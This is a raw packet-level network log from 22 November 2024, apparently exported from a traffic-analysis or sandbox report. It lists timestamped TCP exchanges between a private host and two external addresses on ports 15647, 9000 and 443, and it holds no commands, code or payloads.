                                                                                                          Nov 22, 2024 15:49:50.942223072 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.036608934 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.036840916 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.156641006 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.156706095 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.157437086 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.208781004 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.220726013 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.221332073 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.221352100 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.221703053 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.221709013 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.358061075 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.358171940 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.380103111 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.380621910 CET49938443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.380708933 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.381129980 CET49938443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.381145954 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.398430109 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.398499966 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.534840107 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.535123110 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.536151886 CET90004993945.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.536283016 CET90004993945.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.536359072 CET499399000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.536931038 CET499399000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.559125900 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.559215069 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.647408009 CET499439000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.663218975 CET90004993945.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.666407108 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.669296980 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.669369936 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.669395924 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.669433117 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.669482946 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.669533014 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.669545889 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.669559002 CET49937443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.669564962 CET4434993713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.671933889 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.672030926 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.672132015 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.672276020 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.672312021 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.683964968 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.684024096 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.702418089 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.702522993 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.760205984 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.760293961 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.768812895 CET90004994345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.768889904 CET499439000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.768975973 CET499439000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.822133064 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.822257042 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.833035946 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.836178064 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.836280107 CET49938443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.836363077 CET49938443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.836363077 CET49938443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.836407900 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.836435080 CET4434993813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.843574047 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.843630075 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.843713045 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.843986034 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:51.844006062 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.885382891 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:51.885512114 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:51.888425112 CET90004994345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.004970074 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.005055904 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.124906063 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.124994993 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.206021070 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.206098080 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.286035061 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.286701918 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.286765099 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.287188053 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.287201881 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.326029062 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.326086044 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.326240063 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.380450964 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.445981026 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.446160078 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.456095934 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.456769943 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.456789970 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.457113981 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.457122087 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.566814899 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.567075968 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.574584007 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.614840984 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.746783018 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.747355938 CET49942443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.747436047 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.747716904 CET49942443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.747734070 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.768310070 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.768630028 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.799913883 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.802961111 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.803153992 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.803153992 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.803154945 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.805392981 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.805433989 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.805509090 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.805632114 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.805645943 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.887967110 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.888058901 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:52.900517941 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.903951883 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.904004097 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.904098988 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.904098988 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.904140949 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.904140949 CET49941443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.904158115 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.904169083 CET4434994113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.906426907 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.906486988 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:52.906707048 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.906867981 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:52.906889915 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.009179115 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.009274960 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.080292940 CET90004994345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.080365896 CET90004994345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.080415010 CET499439000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.080439091 CET499439000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.089039087 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.089122057 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.114851952 CET49940443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.114890099 CET4434994013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.191565037 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.193356991 CET499489000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.195149899 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.195239067 CET49942443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.195307970 CET49942443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.195307970 CET49942443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.195348978 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.195369959 CET4434994213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.197500944 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.197552919 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.197626114 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.197745085 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.197756052 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.201277018 CET90004994345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.209677935 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.209728003 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.216882944 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.271086931 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.312963963 CET90004994845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.313061953 CET499489000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.313159943 CET499489000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.330379963 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.330585003 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.432919025 CET90004994845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.504400969 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.504870892 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.504919052 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.505266905 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.505280018 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.533008099 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.533123016 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.653305054 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.653393984 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.673789024 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.674390078 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.674473047 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.674788952 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.674807072 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.772979975 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.773154020 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.852746964 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.852844954 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.949822903 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.952780008 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.952904940 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.952908993 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.952970982 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.953042984 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.953069925 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.953095913 CET49944443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.953100920 CET4434994413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.955909967 CET49950443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.955967903 CET4434995013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.956054926 CET49950443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.956213951 CET49950443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:53.956224918 CET4434995013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.973324060 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:53.973531008 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:53.974133968 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.021094084 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.094049931 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.094294071 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.117144108 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.120253086 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.120347977 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.120431900 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.120433092 CET49945443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.120479107 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.120505095 CET4434994513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.122883081 CET49951443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.122925043 CET4434995113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.123001099 CET49951443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.123125076 CET49951443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.123132944 CET4434995113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.294557095 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.294668913 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.426544905 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.426721096 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.495779037 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.495886087 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.548806906 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.549362898 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.549407005 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.549787998 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.549806118 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.615869999 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.615941048 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.617082119 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.635839939 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.636240959 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.636323929 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.636631012 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.636646032 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.661710024 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.669744015 CET90004994845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.669857025 CET90004994845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.669966936 CET499489000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.670139074 CET499489000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.751050949 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.751131058 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.772383928 CET499529000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.789676905 CET90004994845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.892030954 CET90004995245.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.892159939 CET499529000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.892285109 CET499529000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.937216997 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.937294006 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:54.987232924 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.987736940 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.987765074 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:54.988132000 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:54.988137960 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.003753901 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.006921053 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.006968021 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.006988049 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.007038116 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.007092953 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.007092953 CET49947443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.007133961 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.007163048 CET4434994713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.009361982 CET49953443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.009397030 CET4434995313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.009466887 CET49953443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.009598017 CET49953443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.009605885 CET4434995313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.011719942 CET90004995245.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.073348045 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.073450089 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.084530115 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.087640047 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.087718964 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.087804079 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.087804079 CET49946443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.087852001 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.087878942 CET4434994613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.089658976 CET49954443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.089742899 CET4434995413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.089837074 CET49954443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.089951038 CET49954443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.089973927 CET4434995413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.138308048 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.138374090 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.258383036 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.258450031 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.384562969 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.384630919 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.422669888 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.436243057 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.439199924 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.439383030 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.439424038 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.439439058 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.439449072 CET49949443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.439452887 CET4434994913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.441608906 CET49955443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.441642046 CET4434995513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.441715002 CET49955443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.441837072 CET49955443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.441853046 CET4434995513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.474199057 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.585975885 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.586064100 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.668054104 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.668128967 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.710424900 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.710551977 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.777909994 CET4434995013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.778399944 CET49950443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.778425932 CET4434995013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.779047966 CET49950443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.779052973 CET4434995013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.787121058 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.787188053 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.830292940 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.830343008 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:55.918313980 CET4434995113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.918704987 CET49951443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:55.918729067 CET4434995113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:55.919084072 CET49951443192.168.2.713.107.246.63
